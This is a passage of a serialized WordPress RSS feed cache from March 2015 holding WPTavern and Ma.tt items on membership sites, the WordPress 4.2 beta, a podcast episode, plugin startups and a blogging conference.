require some code knowledge, but it can deliver valuable insights if you use it correctly. Jonathan notes, “It’s basically as comprehensive as you make it.”</p>\n<p>They can also mesh tools. They can track which A/B test from Optimizely a customer signed up with, and then use Mixpanel to track what they did and how they did it. They can get login metrics, renewal numbers, and more for each plan and signup flow.</p>\n<p>Mixpanel requires PHP and JavaScript knowledge to utilize, but Optimizely has an extensive visual interface that doesn’t require code knowledge to utilize.</p>\n<h3>What encourages membership signups</h3>\n<p>“It varies day to day, week to week, month to month,” in regard to how their signups work. A bad month in the economy can make their signups go down. Sometimes quarterly users will spike while monthly users are steady.</p>\n<p>Their biggest thing that affects signup rates is customer support. Some presale, but also support for new members to help answer questions and get people engaged. <span class=\"pullquote alignright\">When we can help someone answer the question, “Where do I go next?”, we are able to keep them for a long time.</span></p>\n<p>They have one or two courses that drive a ton of traffic to their site, and it is therefore their largest onboarding channel for new members. However, they don’t have a silver bullet for what it takes to get new users. They are always trying new things.</p>\n<h3>On competing and the industry</h3>\n<p>Jonathan doesn’t see themselves as a part of a singular industry. While many think of CG as a part of the film industry, it’s one of dozens of potential applications, and they don’t want to narrow themselves to a particular one.</p>\n<p>They also poll users to get a feel for who they are and what industry actual users come from. Based on around a thousand responses, they had no real pattern at all. The results were all over the board.</p>\n<p>So they don’t want to compete with a film tutorials site or any other industry site. They want to focus on the tool itself. They want to teach people how to use Blender and show them how it can be applied to various industries their users are a part of.</p>\n<h3>Advice for those running membership sites</h3>\n<blockquote><p>“Build your community would be the main one. It’s one thing to offer a really good product. It’s one thing to build a really good website. But if you don’t have the community behind you that’s going to be willing to trust in you with their wallet … it’s not going to go anywhere long term, sustainably.”</p></blockquote>\n<p>Jonathan says it’s about building the community as well as the sense of trust within that community. He believes that customers will want to know that not only the content will be worth it, but that it will continue to be worth it — and that the communication and support from the team behind the site will be consistent as well.</p>\n<p>He believes that subscriptions and products are very different. With a subscription, the interaction is just as or far more important than specific content itself.</p>\n<p>When he refers to community, he doesn’t mean it has to be strictly through something like a forum. He considers it a broad term, and for them it evolved out of their Blender community user base. At the time we recorded this, they didn’t have forums, a dedicated chat system, or an actual community integration part — though <a href=\"http://community.cgcookie.com/\">they have opened a forum</a> since we chatted. But the community exists and thrives within comments and their gallery functionality.</p>\n<h3>Wrapping up</h3>\n<p>Jonathan is full of great advice and I could listen to him talk about membership sites for a long time. I have no experience with CG but at the end of this interview he had me wanted to go build something with Blender.</p>\n<p>You can (and should) keep up with <a href=\"https://twitter.com/carter2422\">Jonathan on Twitter</a>, or perhaps you’ll see him at a conference near you — but you’ll probably think it’s Pippin at first. Also be sure to checkout <a href=\"http://cgcookie.com/\">CGCookie’s website</a>; it’s really great.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 Mar 2015 17:01:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"Matt: Love is the light that sparked when only darkness existed\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"http://ma.tt/2015/03/love-is-the-light-that-sparked-when-only-darkness-existed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"http://ma.tt/2015/03/love-is-the-light-that-sparked-when-only-darkness-existed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:186:\"<p> <img alt=\"\" src=\"http://i1.wp.com/ma.tt/files/2015/03/IMG_5196.jpg?resize=604%2C466\" title=\"\" class=\"size-custom\" /></p>\n<p>Taken in Houston today. Happy birthday Mom! </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 Mar 2015 15:49:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"Matt: Government Taking Over Internet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44766\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"http://ma.tt/2015/03/government-taking-over-internet/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:569:\"<p>Since the Title II ruling from the FCC there’s been a lot of partisan rhetoric about the government taking over the internet, <a href=\"http://ma.tt/2015/02/net-neutrality-win/\">even in the comments of this very blog</a>. I just came across Brad Feld’s post, <a href=\"http://feld.com/archives/2015/02/final-thoughts-fcc-title-ii-ahead-tomorrows-vote-net-neutrality.html\">Some Final Thoughts on the FCC and Title II Ahead of Tomorrow’s Vote on Net Neutrality</a> and he does an awesome job breaking down and addressing each of the misconceptions.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 Mar 2015 02:06:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"WPTavern: WordPress 4.2 Beta 1 Now Available for Testing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40568\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"http://wptavern.com/wordpress-4-2-beta-1-now-available-for-testing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3336:\"<p><a href=\"https://wordpress.org/news/2015/03/wordpress-4-2-beta-1/\" target=\"_blank\">WordPress 4.2 beta 1</a> is now available for early testers to download. It’s “pencils down” time for core contributors as far as new feature requests are concerned. This is the point in the release cycle where contributors are focusing their efforts on bug fixes and inline documentation.</p>\n<p>Drew Jaynes, the 4.2 release lead, posted the <a href=\"https://wordpress.org/news/2015/03/wordpress-4-2-beta-1/\" target=\"_blank\">beta release announcement</a> and summarized the main features that could use further testing. The <a href=\"http://wptavern.com/preview-the-press-this-bookmarklet-redesign-alpha-plugin-now-ready-for-testing\" target=\"_blank\">Press This bookmarklet feature has been totally redeigned</a> to be more intuitive and mobile-friendly. If you want to test it out, install the beta and then navigate to the Tools screen in the admin.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/06/press-this-featured.jpg\" rel=\"prettyphoto[40568]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/06/press-this-featured.jpg?resize=898%2C408\" alt=\"press-this-featured\" class=\"aligncenter size-full wp-image-24221\" /></a></p>\n<p>Jaynes also encourages users to test drive the new theme browsing and switching capabilities that are now built into the customizer. “We’re especially interested to know if this helps streamline the process of setting up your site,” he said.</p>\n<p>The customizer theme switcher is one of the more controversial additions to this release. The new feature was met with a significant amount of resistance from our commenters when it was <a href=\"http://wptavern.com/customizer-theme-switcher-approved-for-merge-into-wordpress-4-2\" target=\"_blank\">approved for merge into WordPress 4.2</a>.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/customizer-theme-switcher.jpg\" rel=\"prettyphoto[40568]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/customizer-theme-switcher.jpg?resize=1025%2C473\" alt=\"customizer-theme-switcher\" class=\"aligncenter size-full wp-image-38931\" /></a></p>\n<p>The installation and update process for plugins has been beautifully re-tooled to provide a smoother, more convenient experience where users can perform these actions without leaving the Plugins screen. Feel free to leave any feedback on the corresponding <a href=\"https://core.trac.wordpress.org/ticket/29820\" target=\"_blank\">ticket</a> for this improvement.</p>\n<p>WordPress 4.2 also <a href=\"http://wptavern.com/wordpress-4-2-on-track-to-expand-core-support-for-emoji\" target=\"_blank\">expands core support for emoji</a>. Jaynes suggested that users go to town on testing it everywhere.</p>\n<p>“If you felt like emoji were starkly missing from your content toolbox, worry no more,” he said. “We’ve added emoji support nearly everywhere, even post slugs.”</p>\n<p>According to the current <a href=\"https://make.wordpress.org/core/version-4-2-project-schedule/\" target=\"_blank\">4.2 project schedule</a>, the official release is targeted for the week of April 22nd. A series of betas and at least one release candidate are likely to precede the official release during the course of the next month.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 Mar 2015 00:01:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"WPTavern: WPWeekly Episode 183 – Backing Up The Backup\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wptavern.com?p=40559&preview_id=40559\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"http://wptavern.com/wpweekly-episode-183-backing-up-the-backup\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4337:\"<p>In this episode of WordPress Weekly, <a title=\"http://onlinebizcoach.com/\" href=\"http://onlinebizcoach.com/\">Marcus Couch</a> and I discuss a lot of different stories. We share our opinions on the redesigned theme and plugin directories. We discuss CodeGuard’s survey results that indicate WordPress users need a lot more education on backup plugins, strategies, and services. Last but not least, we discuss the WordPress history book. Near the end of the show, Marcus describes a new venture he’s pursuing to help coach online businesses.</p>\n<h2>Stories Discussed:</h2>\n<p><a title=\"http://wptavern.com/wordpress-version-stats-updated-more-than-13-of-sites-are-running-wordpress-4-1\" href=\"http://wptavern.com/wordpress-version-stats-updated-more-than-13-of-sites-are-running-wordpress-4-1\">WordPress Version Stats Updated: More Than 1/3 of Sites are Running WordPress 4.1</a><br />\n<a title=\"http://wptavern.com/wordpress-plugin-directory-launches-new-design\" href=\"http://wptavern.com/wordpress-plugin-directory-launches-new-design\">WordPress Plugin Directory Launches New Design</a><br />\n<a title=\"http://wptavern.com/wordpress-theme-directory-launches-new-design\" href=\"http://wptavern.com/wordpress-theme-directory-launches-new-design\">WordPress Theme Directory Launches New Design</a><br />\n<a title=\"http://wptavern.com/version-one-of-the-wordpress-history-book-is-ready-for-review\" href=\"http://wptavern.com/version-one-of-the-wordpress-history-book-is-ready-for-review\">Version One of The WordPress History Book is Ready For Review</a><br />\n<a title=\"http://wptavern.com/wordpress-publishes-security-white-paper\" href=\"http://wptavern.com/wordpress-publishes-security-white-paper\">WordPress Publishes Security White Paper</a><br />\n<a title=\"http://wptavern.com/codeguard-survey-shows-more-education-is-needed-on-backup-software-services-and-strategies-for-wordpress\" href=\"http://wptavern.com/codeguard-survey-shows-more-education-is-needed-on-backup-software-services-and-strategies-for-wordpress\">CodeGuard Survey Shows More Education is Needed on Backup Software, Services, and Strategies For WordPress</a><br />\n<a title=\"http://wptavern.com/bbpress-2-5-5-released-patches-three-potential-security-vulnerabilities\" href=\"http://wptavern.com/bbpress-2-5-5-released-patches-three-potential-security-vulnerabilities\">bbPress 2.5.5 Released, Patches Three Potential Security Vulnerabilities</a><br />\n<a title=\"http://wptavern.com/blind-sql-injection-vulnerability-discovered-in-wordpress-seo-plugin-by-yoast-immediate-update-recommended\" href=\"http://wptavern.com/blind-sql-injection-vulnerability-discovered-in-wordpress-seo-plugin-by-yoast-immediate-update-recommended\">Blind SQL Injection Vulnerability Discovered in WordPress SEO Plugin by Yoast: Immediate Update Recommended</a></p>\n<h2>Plugins Picked By Marcus:</h2>\n<p><a title=\"https://wordpress.org/plugins/custom-upload-folders-plus/\" href=\"https://wordpress.org/plugins/custom-upload-folders-plus/\">Custom Upload Folders Plus</a> lets you organize file uploads by file type and logged in users.</p>\n<p><a title=\"https://wordpress.org/plugins/scratchpad/\" href=\"https://wordpress.org/plugins/scratchpad/\">Scratchpad</a> lets you keep running notes when composing your posts. It can be used to keep an outline for the post, be visible next to the post, or to have a list of links or snippets to refer to.</p>\n<p><a title=\"https://wordpress.org/plugins/gravity-buttons/\" href=\"https://wordpress.org/plugins/gravity-buttons/\">Gravity Buttons</a> is a powerful button creation plugin that allows anyone to create great-looking CSS3 buttons that can be used anywhere on your site.</p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, March 18th 9:30 P.M. Eastern</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href=\"http://www.wptavern.com/feed/podcast\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #183:</strong><br />\n</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 12 Mar 2015 22:58:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"WPTavern: Is a WordPress Plugin a Startup?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40528\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://wptavern.com/is-a-wordpress-plugin-a-startup\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:8949:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/petersuhm.jpeg\" rel=\"prettyphoto[40528]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/petersuhm.jpeg?resize=150%2C150\" alt=\"petersuhm\" class=\"alignright size-thumbnail wp-image-40534\" /></a>This post was contributed by guest author <a href=\"http://petersuhm.com/\" target=\"_blank\">Peter Suhm</a>. Peter is a web developer from the Land of the Danes. He is the creator of <a href=\"http://wptavern.com/wp-pusher-aims-to-provide-pain-free-deployment-of-wordpress-themes-and-plugins-from-github\" target=\"_blank\">WP Pusher</a> and a huge travel addict, bringing his work along with him as he goes.<br />\n </p>\n<hr />\n<p>About two months ago, I released my first commercial WordPress product, <a href=\"https://wppusher.com/\" target=\"_blank\">WP Pusher</a>, a plugin that makes deploying themes and plugins really easy. WP Pusher was not meant to be “just a plugin”. It was supposed to be a SaaS product, and throughout it all, when I was building it, I always thought of it as a startup I was creating.</p>\n<p>For “just a WordPress plugin”, I think it has been quite successful so far, and to a large extent, I believe that to be a result of my own perception of the whole thing. I think it was more successful because, even after I realized it was just going to be a plugin, I still treated it as a startup.</p>\n<h2>What Is a Startup?</h2>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/office.jpeg\" rel=\"prettyphoto[40528]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/office.jpeg?resize=1025%2C493\" alt=\"office\" class=\"aligncenter size-full wp-image-40552\" /></a></p>\n<p>In the fall of 2014, I was traveling around Southeast Asia, enjoying the digital nomad lifestyle, while making WP Pusher. I spent quite a bit of time in Chiang Mai, the capital of digital nomads, and everyone was talking about a guy named Pieter Levels, who did all kinds of cool things, all related to digital nomadism. One of these things was to take up the challenge of building a new startup every month for 12 months.</p>\n<p>Hearing people talk about Pieter’s startup quest got me thinking about the term “startup”. Honestly, when I first heard about it, I did not think of the 12 startups as real startups – which Pieter obviously did. To me, creating a portfolio of 12 startups in such a short time seemed a bit silly. In my head, a real startup required more dedication and commitment than that.</p>\n<p>In the meantime, some of Pieter’s startups have been really successful and the whole process has been really inspiring to follow. I now understand that my idea of a startup was missing some pieces. All of the 12 projects that Pieter created qualified as startups. Some of them were more successful than others, but he validated 12 ideas in a short time and the result is really impressive. And one thing, which is very important, is that Pieter treated all of the 12 projects as startups instead of just another side project (which is how many developers talk about their projects). Calling something a side project is an easy way of protecting yourself against your fear of failure.</p>\n<p>If you ask Steve Blank about his definition of a startup, he will tell you that <a href=\"http://steveblank.com/2010/01/25/whats-a-startup-first-principles/\" target=\"_blank\">“a startup is an organization formed to search for a repeatable and scalable business model”</a>. If we break that up, “an organization” can mean anything. It can be you alone or it can be a team. “Repeatable” and “scalable” are two sides of the same coin.</p>\n<p>Building a WordPress plugin and calling it a day is not enough. That is not a startup. Honestly, to me, “repeatable“ is the main factor. I am in it for the freedom – not the empire building. I want a business to be repeatable in the sense that I can teach someone else how to run it for me – hence, freedom. It does not have to be scalable in order to put food on my table or allow me to travel around the world – it just has to be profitable.</p>\n<p>WordPress offers a giant market full of small niches and potential customers. There is no reason why something you are building for WordPress could not be as huge as any other software startup. The market share of the WordPress platform is <a href=\"http://w3techs.com/technologies/overview/content_management/all/\" target=\"_blank\">large enough</a>.</p>\n<p>In relation to the Steve Blank quote, what could you do to make your WordPress plugin a startup instead of a side project? First of all, you need to think about the “organization”. Most likely, you are the programmer or the engineer behind your product. But do you know how to design a shiny, high-converting landing page? Do you have any clue about how to approach marketing or customer relations? What about the legal and financial aspects? Maybe you do. If you do not, you need to either be willing to learn or team up with someone who does. At the very minimum, you need to at least consider it.</p>\n<p>How can you build a business around a WordPress plugin that is more “repeatable” and “scalable”? Well, you could do most of the things that other startups do. Here are a few questions to consider:</p>\n<ul>\n<li>Could you charge more or offer more expensive options?</li>\n<li>Could you turn your plugin into a SaaS or find something that you could charge for on a recurring basis?</li>\n<li>Could you sell additional add-ons or extensions for your plugin?</li>\n<li>Could you offer a service in addition to your plugin?</li>\n<li>Given you solve some kind of pain for your customers, could you copy your idea to other niches or customer segments?</li>\n<li>Could you come up with ways to attract more customers on a recurring basis? (SEO, content marketing, advertising etc.)</li>\n<li>Could you have someone else help you find new customers? (copywriters, affiliate partners etc.)</li>\n</ul>\n<p>You get it.</p>\n<h2>Solving Your Own Problems vs. Solving Other People’s Problems</h2>\n<p>A very important point I want to make relates to the business idea of your WordPress plugin. In a market like WordPress, programmers tend to be tempted to find solutions to their own problems – not necessarily other people’s problems. Finding a solution for a problem you have yourself is a good place to start and great for motivation, domain knowledge and so on, but it is not enough.</p>\n<p>If you want it to be a business, you need to make sure that other people have the same problem and are willing to pay for it. Startups are not made to solve their own problems. The original business idea behind the startup might have been to solve a problem the founder had, but if the only customer in the startup is going to be the founder alone, it is not a very good business model. You need to figure out how you can make your product relevant to more people – not everyone of course, but more people than yourself.</p>\n<p>As an example, WP Pusher solves a problem I had with clients. There were already solutions to this problem – both free and paid. Most of them required either Git installed or that I granted them access to my clients’ servers. Given I am actually in control of, or at least have an influence over, most of the server environments of my clients, I could in theory have used one of these existing solutions.</p>\n<p>However, I knew that was not the case for a lot of WordPress developers. I saw the possibility of solving my own problem as well as solving a problem I knew a lot of other developers had. Reading about Pieter’s 12 startups inspires me to build more products for WordPress. Solve more problems. Build more startups.</p>\n<h2>Say It Out Loud</h2>\n<p>When I thought WP Pusher was going to be a SaaS business, I thought of it as a startup. When I decided to change the business model and rebuild it all as a single plugin, it felt weird calling it a business – or even a startup. For a short time I think I phrased it as “just a project for WordPress”, when telling people about it.</p>\n<p>Personally, I still like to think of it as a startup. I kept the landing page I built for the SaaS and I kept the blog I set up. I kept everything that I initially made when it was a “startup” I was working on. Today, I have made a conscious decision that it is in fact a startup – no matter how big or small it is.</p>\n<p>WP Pusher has many characteristics of a startup. It solves a very obvious pain point that is easy to communicate. It has a simple business model in a very large market. And finally, it has a logo and it has a nice landing page. That is a startup right there.</p>\n<p>What are you missing before you can confidently call your WordPress plugin a startup?</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 12 Mar 2015 21:28:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"Matt: Portland + Phoenix Press Publish Events\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44801\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"http://ma.tt/2015/03/portland-phoenix-press-publish-events/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:775:\"<p>We’re organizing an exciting <a href=\"http://presspublish.events/\">new conference series focused on blogging, called Press Publish</a>. The speaker list has some really awesome folks on it, and will include notable WordPress bloggers telling their stories as well as <a href=\"http://automattic.com/\">Automattic</a> employees teaching tutorials and workshops. Plus, WordPress.com Happiness Engineers will be ready and waiting to help people one-on-one with their blogs.</p>\n<p>The first two events are in <strong>Portland</strong> on March 28 and in <strong>Phoenix</strong> on April 18, and <a href=\"http://presspublish.events/register/?tix_coupon=MATTBLOG\">if you register with this link in the next week or so you get a discount</a>, special for Ma.tt readers.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 12 Mar 2015 04:58:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"WPTavern: EDD 2.3 Introduces New Customer Management Interface and Performance 